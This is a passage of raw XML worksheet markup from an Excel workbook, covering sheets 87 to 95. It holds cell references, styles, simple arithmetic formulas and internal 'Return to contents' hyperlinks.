    <row r="23" spans="1:15" s="9" customFormat="1" ht="17.399999999999999" thickBot="1">
      <c r="A23" s="128">
        <v>21</v>
      </c>
      <c r="B23" s="130" t="s">
        <v>20</v>
      </c>
      <c r="C23" s="131" t="s">
        <v>19</v>
      </c>
      <c r="D23" s="10"/>
    </row>
    <row r="24" spans="1:15" s="9" customFormat="1" ht="15" thickBot="1">
      <c r="A24" s="128">
        <v>22</v>
      </c>
      <c r="B24" s="130" t="s">
        <v>18</v>
      </c>
      <c r="C24" s="131" t="s">
        <v>17</v>
      </c>
      <c r="D24" s="10"/>
    </row>
    <row r="25" spans="1:15" s="9" customFormat="1" ht="15" thickBot="1">
      <c r="A25" s="128">
        <v>23</v>
      </c>
      <c r="B25" s="130" t="s">
        <v>15</v>
      </c>
      <c r="C25" s="131" t="s">
        <v>16</v>
      </c>
      <c r="D25" s="10"/>
    </row>
    <row r="26" spans="1:15" s="9" customFormat="1" ht="15" thickBot="1">
      <c r="A26" s="128">
        <v>24</v>
      </c>
      <c r="B26" s="130" t="s">
        <v>15</v>
      </c>
      <c r="C26" s="131" t="s">
        <v>14</v>
      </c>
      <c r="D26" s="10"/>
    </row>
    <row r="27" spans="1:15" ht="12" customHeight="1" thickBot="1">
      <c r="A27" s="128"/>
      <c r="B27" s="129"/>
      <c r="C27" s="131"/>
    </row>
    <row r="28" spans="1:15" ht="28.2" customHeight="1" thickBot="1">
      <c r="A28" s="128"/>
      <c r="B28" s="129"/>
      <c r="C28" s="131" t="s">
        <v>13</v>
      </c>
      <c r="D28" s="7"/>
      <c r="E28" s="7"/>
      <c r="F28" s="7"/>
      <c r="G28" s="7"/>
      <c r="H28" s="7"/>
      <c r="I28" s="7"/>
      <c r="J28" s="7"/>
      <c r="K28" s="7"/>
      <c r="L28" s="7"/>
      <c r="M28" s="7"/>
      <c r="N28" s="7"/>
      <c r="O28" s="7"/>
    </row>
    <row r="29" spans="1:15" ht="15" thickBot="1">
      <c r="A29" s="128"/>
      <c r="B29" s="129"/>
      <c r="C29" s="134">
        <f>884.3/31.1035*6.83</f>
        <v>194.18293761152282</v>
      </c>
    </row>
    <row r="30" spans="1:15" ht="15" thickBot="1">
      <c r="A30" s="128"/>
      <c r="B30" s="129"/>
      <c r="C30" s="134">
        <f>11.295/31.1035*6.83</f>
        <v>2.4802626714035396</v>
      </c>
    </row>
    <row r="31" spans="1:15" ht="15" thickBot="1">
      <c r="A31" s="128"/>
      <c r="B31" s="129"/>
      <c r="C31" s="134">
        <f>951.5/31.1035*6.83</f>
        <v>208.9393476618387</v>
      </c>
    </row>
    <row r="32" spans="1:15" ht="15" thickBot="1">
      <c r="A32" s="128"/>
      <c r="B32" s="129"/>
      <c r="C32" s="131"/>
    </row>
    <row r="33" spans="1:3" ht="15" thickBot="1">
      <c r="A33" s="128"/>
      <c r="B33" s="129"/>
      <c r="C33" s="131"/>
    </row>
    <row r="34" spans="1:3" ht="15" thickBot="1">
      <c r="A34" s="128"/>
      <c r="B34" s="129"/>
      <c r="C34" s="131"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="C2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="68" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet87.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FF002060"/>
  </sheetPr>
  <dimension ref="A1:B3"/>
  <sheetViews>
    <sheetView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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="1" t="s">
        <v>67</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet88.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FF00B050"/>
  </sheetPr>
  <dimension ref="A1:B3"/>
  <sheetViews>
    <sheetView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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="1" t="s">
        <v>71</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet89.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="6" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:B3"/>
  <sheetViews>
    <sheetView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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2" ht="28.8">
      <c r="B3" s="1" t="s">
        <v>73</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet90.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="5" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:B31"/>
  <sheetViews>
    <sheetView showGridLines="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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="17" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="2" spans="2:2" ht="15" thickBot="1">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2" ht="29.4" thickBot="1">
      <c r="B3" s="125" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="4" spans="2:2" ht="15" thickBot="1">
      <c r="B4" s="125"/>
    </row>
    <row r="5" spans="2:2" ht="15" thickBot="1">
      <c r="B5" s="125" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="6" spans="2:2" ht="15" thickBot="1">
      <c r="B6" s="125" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="7" spans="2:2" ht="15" thickBot="1">
      <c r="B7" s="125" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="8" spans="2:2" ht="15" thickBot="1">
      <c r="B8" s="125" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="9" spans="2:2" ht="15" thickBot="1">
      <c r="B9" s="125"/>
    </row>
    <row r="10" spans="2:2" ht="29.4" thickBot="1">
      <c r="B10" s="125" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="11" spans="2:2" ht="15" thickBot="1">
      <c r="B11" s="125" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="12" spans="2:2" ht="15" thickBot="1">
      <c r="B12" s="125"/>
    </row>
    <row r="13" spans="2:2" ht="15" thickBot="1">
      <c r="B13" s="125" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="14" spans="2:2" ht="15" thickBot="1">
      <c r="B14" s="125"/>
    </row>
    <row r="15" spans="2:2" ht="15" thickBot="1">
      <c r="B15" s="125" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="16" spans="2:2" ht="15" thickBot="1">
      <c r="B16" s="125" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="17" spans="2:2" ht="15" thickBot="1">
      <c r="B17" s="125" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="18" spans="2:2" ht="15" thickBot="1">
      <c r="B18" s="125" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="19" spans="2:2" ht="15" thickBot="1">
      <c r="B19" s="125" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="20" spans="2:2" ht="15" thickBot="1">
      <c r="B20" s="125"/>
    </row>
    <row r="21" spans="2:2" ht="15" thickBot="1">
      <c r="B21" s="125" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="22" spans="2:2" ht="15" thickBot="1">
      <c r="B22" s="135" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="23" spans="2:2" ht="15" thickBot="1">
      <c r="B23" s="125"/>
    </row>
    <row r="24" spans="2:2" ht="15" thickBot="1">
      <c r="B24" s="125" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="25" spans="2:2" ht="15" thickBot="1">
      <c r="B25" s="125" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="26" spans="2:2" ht="15" thickBot="1">
      <c r="B26" s="125" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="27" spans="2:2" ht="15" thickBot="1">
      <c r="B27" s="125" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="28" spans="2:2" ht="15" thickBot="1">
      <c r="B28" s="125" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="29" spans="2:2" ht="15" thickBot="1">
      <c r="B29" s="125"/>
    </row>
    <row r="30" spans="2:2" ht="15" thickBot="1">
      <c r="B30" s="125"/>
    </row>
    <row r="31" spans="2:2" ht="15" thickBot="1">
      <c r="B31" s="125"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
    <hyperlink ref="B22" location="Windows轻松传送!A1" display="参考Windows轻松传送"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="70" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet91.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FFC00000"/>
  </sheetPr>
  <dimension ref="A1:D41"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <pane ySplit="2" topLeftCell="A3" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B6" sqref="B6"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="17.44140625" style="16" customWidth="1"/>
    <col min="2" max="2" width="50.44140625" style="16" customWidth="1"/>
    <col min="3" max="3" width="8.88671875" style="16"/>
    <col min="4" max="4" width="38.21875" style="16" customWidth="1"/>
    <col min="5" max="16384" width="8.88671875" style="16"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="14" customFormat="1" ht="15.6">
      <c r="A1" s="18" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="2" spans="1:4" customFormat="1" ht="15" thickBot="1">
      <c r="A2" s="2"/>
      <c r="B2" s="16"/>
      <c r="D2" s="4" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="3" spans="1:4" ht="15" thickBot="1">
      <c r="A3" s="136" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="137" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="4" spans="1:4" ht="15" thickBot="1">
      <c r="A4" s="136" t="s">
        <v>109</v>
      </c>
      <c r="B4" s="137" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="5" spans="1:4" ht="15" thickBot="1">
      <c r="A5" s="136" t="s">
        <v>111</v>
      </c>
      <c r="B5" s="137" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="6" spans="1:4" ht="15" thickBot="1">
      <c r="A6" s="136" t="s">
        <v>113</v>
      </c>
      <c r="B6" s="137" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="7" spans="1:4" ht="15" thickBot="1">
      <c r="A7" s="136" t="s">
        <v>115</v>
      </c>
      <c r="B7" s="137" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="8" spans="1:4" ht="15" thickBot="1">
      <c r="A8" s="136" t="s">
        <v>117</v>
      </c>
      <c r="B8" s="137" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="9" spans="1:4" ht="15" thickBot="1">
      <c r="A9" s="136" t="s">
        <v>119</v>
      </c>
      <c r="B9" s="137" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="10" spans="1:4" ht="15" thickBot="1">
      <c r="A10" s="136" t="s">
        <v>121</v>
      </c>
      <c r="B10" s="137" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="11" spans="1:4" ht="29.4" thickBot="1">
      <c r="A11" s="136" t="s">
        <v>123</v>
      </c>
      <c r="B11" s="137" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="12" spans="1:4" ht="15" thickBot="1">
      <c r="A12" s="136" t="s">
        <v>125</v>
      </c>
      <c r="B12" s="137" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="13" spans="1:4" ht="15" thickBot="1">
      <c r="A13" s="136" t="s">
        <v>127</v>
      </c>
      <c r="B13" s="137" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="14" spans="1:4" ht="15" thickBot="1">
      <c r="A14" s="136" t="s">
        <v>129</v>
      </c>
      <c r="B14" s="137" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="15" spans="1:4" ht="15" thickBot="1">
      <c r="A15" s="136" t="s">
        <v>131</v>
      </c>
      <c r="B15" s="137" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="16" spans="1:4" ht="15" thickBot="1">
      <c r="A16" s="136" t="s">
        <v>133</v>
      </c>
      <c r="B16" s="137" t="s">
        <v>134</v>
      </c>
      <c r="D16" s="16" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="17" spans="1:4" ht="15" thickBot="1">
      <c r="A17" s="136" t="s">
        <v>135</v>
      </c>
      <c r="B17" s="137" t="s">
        <v>136</v>
      </c>
      <c r="D17" s="16" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="18" spans="1:4" ht="15" thickBot="1">
      <c r="A18" s="136" t="s">
        <v>111</v>
      </c>
      <c r="B18" s="137" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="19" spans="1:4" ht="15" thickBot="1">
      <c r="A19" s="136" t="s">
        <v>137</v>
      </c>
      <c r="B19" s="137" t="s">
        <v>138</v>
      </c>
    </row>
    <row r="20" spans="1:4" ht="15" thickBot="1">
      <c r="A20" s="136" t="s">
        <v>139</v>
      </c>
      <c r="B20" s="137" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="21" spans="1:4" ht="15" thickBot="1">
      <c r="A21" s="136" t="s">
        <v>140</v>
      </c>
      <c r="B21" s="137" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="22" spans="1:4" ht="15" thickBot="1">
      <c r="A22" s="136" t="s">
        <v>142</v>
      </c>
      <c r="B22" s="137" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="23" spans="1:4" ht="58.2" thickBot="1">
      <c r="A23" s="136" t="s">
        <v>144</v>
      </c>
      <c r="B23" s="137" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="24" spans="1:4" ht="15" thickBot="1">
      <c r="A24" s="136" t="s">
        <v>146</v>
      </c>
      <c r="B24" s="137" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="25" spans="1:4" ht="15" thickBot="1">
      <c r="A25" s="136" t="s">
        <v>148</v>
      </c>
      <c r="B25" s="137" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="26" spans="1:4" ht="15" thickBot="1">
      <c r="A26" s="136" t="s">
        <v>150</v>
      </c>
      <c r="B26" s="137" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="27" spans="1:4" ht="15" thickBot="1">
      <c r="A27" s="136" t="s">
        <v>152</v>
      </c>
      <c r="B27" s="137" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="28" spans="1:4" ht="15" thickBot="1">
      <c r="A28" s="136" t="s">
        <v>154</v>
      </c>
      <c r="B28" s="137" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="29" spans="1:4" ht="15" thickBot="1">
      <c r="A29" s="138"/>
      <c r="B29" s="139"/>
    </row>
    <row r="30" spans="1:4" ht="15" thickBot="1">
      <c r="A30" s="140" t="s">
        <v>894</v>
      </c>
      <c r="B30" s="139"/>
    </row>
    <row r="31" spans="1:4" ht="15" thickBot="1">
      <c r="A31" s="140" t="s">
        <v>895</v>
      </c>
      <c r="B31" s="139"/>
    </row>
    <row r="32" spans="1:4" ht="15" thickBot="1">
      <c r="A32" s="140" t="s">
        <v>896</v>
      </c>
      <c r="B32" s="139"/>
    </row>
    <row r="33" spans="1:2" ht="15" thickBot="1">
      <c r="A33" s="140" t="s">
        <v>897</v>
      </c>
      <c r="B33" s="139"/>
    </row>
    <row r="34" spans="1:2" ht="15" thickBot="1">
      <c r="A34" s="140" t="s">
        <v>898</v>
      </c>
      <c r="B34" s="139"/>
    </row>
    <row r="35" spans="1:2" ht="15" thickBot="1">
      <c r="A35" s="138"/>
      <c r="B35" s="139"/>
    </row>
    <row r="36" spans="1:2" ht="15" thickBot="1">
      <c r="A36" s="138" t="s">
        <v>899</v>
      </c>
      <c r="B36" s="139"/>
    </row>
    <row r="37" spans="1:2" ht="15" thickBot="1">
      <c r="A37" s="138" t="s">
        <v>900</v>
      </c>
      <c r="B37" s="139"/>
    </row>
    <row r="38" spans="1:2" ht="15" thickBot="1">
      <c r="A38" s="138" t="s">
        <v>901</v>
      </c>
      <c r="B38" s="139"/>
    </row>
    <row r="39" spans="1:2" ht="15" thickBot="1">
      <c r="A39" s="138" t="s">
        <v>902</v>
      </c>
      <c r="B39" s="139"/>
    </row>
    <row r="40" spans="1:2" ht="15" thickBot="1">
      <c r="A40" s="138" t="s">
        <v>5790</v>
      </c>
      <c r="B40" s="139"/>
    </row>
    <row r="41" spans="1:2" ht="15" thickBot="1">
      <c r="A41" s="138" t="s">
        <v>903</v>
      </c>
      <c r="B41" s="139"/>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="D2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="72" orientation="portrait" r:id="rId1"/>
  <drawing r:id="rId2"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet92.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="3" tint="0.39997558519241921"/>
  </sheetPr>
  <dimension ref="A1:B7"/>
  <sheetViews>
    <sheetView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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="17" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2" ht="28.8">
      <c r="B3" s="1" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="5" spans="2:2" ht="28.8">
      <c r="B5" s="1" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="7" spans="2:2">
      <c r="B7" s="1" t="s">
        <v>164</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="70" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet93.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:B5"/>
  <sheetViews>
    <sheetView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1.88671875" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2" ht="15.6">
      <c r="B1" s="19" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="1" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="5" spans="2:2" ht="28.8">
      <c r="B5" s="1" t="s">
        <v>169</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B2" location="contents!A1" display="Return to contents"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet94.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor theme="5" tint="-0.249977111117893"/>
  </sheetPr>
  <dimension ref="A1:L17"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B6" sqref="B6"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="9.88671875" style="29" customWidth="1"/>
    <col min="2" max="2" width="9" style="29" customWidth="1"/>
    <col min="3" max="3" width="7.109375" style="29" customWidth="1"/>
    <col min="4" max="4" width="19.33203125" style="29" customWidth="1"/>
    <col min="5" max="16384" width="8.88671875" style="29"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" customFormat="1">
      <c r="A1" s="2"/>
      <c r="B1" t="s">
        <v>2976</v>
      </c>
    </row>
    <row r="2" spans="1:12" customFormat="1">
      <c r="A2" s="2"/>
      <c r="B2" s="29"/>
    </row>
    <row r="3" spans="1:12" ht="16.2" customHeight="1">
      <c r="A3" s="559" t="s">
        <v>263</v>
      </c>
      <c r="B3" s="559"/>
      <c r="C3" s="559"/>
      <c r="D3" s="559"/>
      <c r="E3" s="559"/>
      <c r="L3" s="41"/>
    </row>
    <row r="4" spans="1:12" ht="16.2" customHeight="1">
      <c r="A4" s="559" t="s">
        <v>262</v>
      </c>
      <c r="B4" s="559"/>
      <c r="C4" s="559"/>
      <c r="D4" s="559"/>
      <c r="E4" s="559"/>
    </row>
    <row r="6" spans="1:12">
      <c r="A6" s="39" t="s">
        <v>261</v>
      </c>
      <c r="B6" s="40">
        <v>5</v>
      </c>
      <c r="C6" s="565" t="s">
        <v>260</v>
      </c>
      <c r="D6" s="566"/>
      <c r="E6" s="39">
        <v>898</v>
      </c>
    </row>
    <row r="7" spans="1:12">
      <c r="A7" s="558"/>
      <c r="B7" s="557" t="s">
        <v>259</v>
      </c>
      <c r="C7" s="567" t="s">
        <v>258</v>
      </c>
      <c r="D7" s="568"/>
      <c r="E7" s="569"/>
    </row>
    <row r="8" spans="1:12">
      <c r="A8" s="558"/>
      <c r="B8" s="557"/>
      <c r="C8" s="567" t="s">
        <v>257</v>
      </c>
      <c r="D8" s="569"/>
      <c r="E8" s="38" t="s">
        <v>256</v>
      </c>
    </row>
    <row r="9" spans="1:12">
      <c r="A9" s="37" t="s">
        <v>255</v>
      </c>
      <c r="B9" s="35">
        <v>2</v>
      </c>
      <c r="C9" s="570" t="s">
        <v>254</v>
      </c>
      <c r="D9" s="571"/>
      <c r="E9" s="35">
        <f>B6*2*B9</f>
        <v>20</v>
      </c>
    </row>
    <row r="10" spans="1:12">
      <c r="A10" s="37" t="s">
        <v>253</v>
      </c>
      <c r="B10" s="35">
        <v>3</v>
      </c>
      <c r="C10" s="570" t="s">
        <v>252</v>
      </c>
      <c r="D10" s="571"/>
      <c r="E10" s="35">
        <f>(B6+1)*B10</f>
        <v>18</v>
      </c>
    </row>
    <row r="11" spans="1:12">
      <c r="A11" s="561" t="s">
        <v>251</v>
      </c>
      <c r="B11" s="563">
        <v>4</v>
      </c>
      <c r="C11" s="36" t="s">
        <v>250</v>
      </c>
      <c r="D11" s="36" t="s">
        <v>249</v>
      </c>
      <c r="E11" s="35">
        <f>B11*2</f>
        <v>8</v>
      </c>
    </row>
    <row r="12" spans="1:12">
      <c r="A12" s="562"/>
      <c r="B12" s="564"/>
      <c r="C12" s="36" t="s">
        <v>248</v>
      </c>
      <c r="D12" s="36" t="s">
        <v>247</v>
      </c>
      <c r="E12" s="35">
        <f>B6*2</f>
        <v>10</v>
      </c>
    </row>
    <row r="13" spans="1:12">
      <c r="A13" s="34" t="s">
        <v>246</v>
      </c>
      <c r="B13" s="34"/>
      <c r="C13" s="33"/>
      <c r="D13" s="33"/>
      <c r="E13" s="32">
        <f>SUM(E9:E12)</f>
        <v>56</v>
      </c>
    </row>
    <row r="14" spans="1:12">
      <c r="A14" s="31" t="s">
        <v>245</v>
      </c>
      <c r="B14" s="31"/>
      <c r="E14" s="30">
        <f>E6-E13</f>
        <v>842</v>
      </c>
    </row>
    <row r="16" spans="1:12">
      <c r="A16" s="29" t="s">
        <v>244</v>
      </c>
    </row>
    <row r="17" spans="1:5" ht="39" customHeight="1">
      <c r="A17" s="560" t="s">
        <v>243</v>
      </c>
      <c r="B17" s="560"/>
      <c r="C17" s="560"/>
      <c r="D17" s="560"/>
      <c r="E17" s="560"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B7:B8"/>
    <mergeCell ref="A7:A8"/>
    <mergeCell ref="A3:E3"/>
    <mergeCell ref="A4:E4"/>
    <mergeCell ref="A17:E17"/>
    <mergeCell ref="A11:A12"/>
    <mergeCell ref="B11:B12"/>
    <mergeCell ref="C6:D6"/>
    <mergeCell ref="C7:E7"/>
    <mergeCell ref="C8:D8"/>
    <mergeCell ref="C9:D9"/>
    <mergeCell ref="C10:D10"/>
  </mergeCells>
  <phoneticPr fontId="1" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <drawing r:id="rId2"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet95.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:B72"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="2" topLeftCell="A30" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B6" sqref="B6"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="4.21875" style="25" customWidth="1"/>
    <col min="2" max="2" width="121.88671875" style="21" customWidth="1"/>
    <col min="3" max="16384" width="8.88671875" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:2">
      <c r="B1" s="22" t="s">
        <v>224</v>
      </c>
    </row>
    <row r="2" spans="2:2">
      <c r="B2" s="27" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="3" spans="2:2">
      <c r="B3" s="24" t="s">
        <v>226</v>
      </c>
    </row>
    <row r="4" spans="2:2">
      <c r="B4" s="28" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="5" spans="2:2" ht="57.6">
      <c r="B5" s="21" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="6" spans="2:2">
      <c r="B6" s="28" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="7" spans="2:2" ht="43.2">
      <c r="B7" s="21" t="s">
        <v>173</v>
      </c>
